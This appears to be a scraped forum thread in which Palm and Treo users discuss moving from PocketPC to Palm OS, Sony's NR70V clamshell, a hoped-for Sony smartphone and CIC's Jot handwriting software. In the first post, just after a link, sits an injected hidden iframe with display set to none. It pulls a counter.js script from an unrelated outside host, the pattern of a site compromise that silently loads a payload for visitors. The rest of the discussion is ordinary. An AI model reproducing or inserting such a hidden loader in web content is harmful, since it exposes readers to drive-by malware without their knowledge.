+ Reply to Thread

A view going from PPC to Palm OS

http://www.med.unc.edu/~greena/back2palm/<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

That was interesting. And the Sony NR70V is an awesome device. If I wasn't so concered with convergence that would be my stand alone PDA of choice for sure.
    Please visit my picture site: Robert-O-Rama :)

Mod-Blog's SmartPhone Correspondent
    I have been wondering why Sony does not release a SmartPhone with the NR-series form factor. It is already clamshell and easily has the best features of any Palm-based handheld (aside from proprietary memory-stick expansion).

Originally posted by nomad7674
    I have been wondering why Sony does not release a SmartPhone with the NR-series form factor. It is already clamshell and easily has the best features of any Palm-based handheld (aside from proprietary memory-stick expansion).
    Yeah, they should make a wireless version with voice capabilities... of course it would be PDA first, phone second... but for people who prefer that it would be a very attractive option. I'm not sure whether or not I would consider that to be a viable option for myself.... but it would be worth taking a look at anyway. And the NR70V always looks so huge in pictures, but it's actually a pretty compact device considering everything it does. And now the Palm OS 5 version is coming out... I'll bet that will be pretty sweet.
    Please visit my picture site: Robert-O-Rama :)

Originally posted by nomad7674
    I posted a message in another location of this board with my opinion that the Sony-Ericsson collaboration has the devopment potential to come up with some pretty exciting devices.

Anyone fantasysing what could come from a Sony-Kyocera collaboration???
    Dave

Mod-Blog's SmartPhone Correspondent
    If there are any lurkers out there on WindowsCE or PocketPC considering an upgrade, let me highly recommend CIC's Jot software. It allows you to enter information on your Palm the same was as on a WinCE/PocketPC device - no grafiti strokes to learn. It got me smoothly off of my old Philips Nino (FYI, that link is to someone else's great Nino page, not mine.)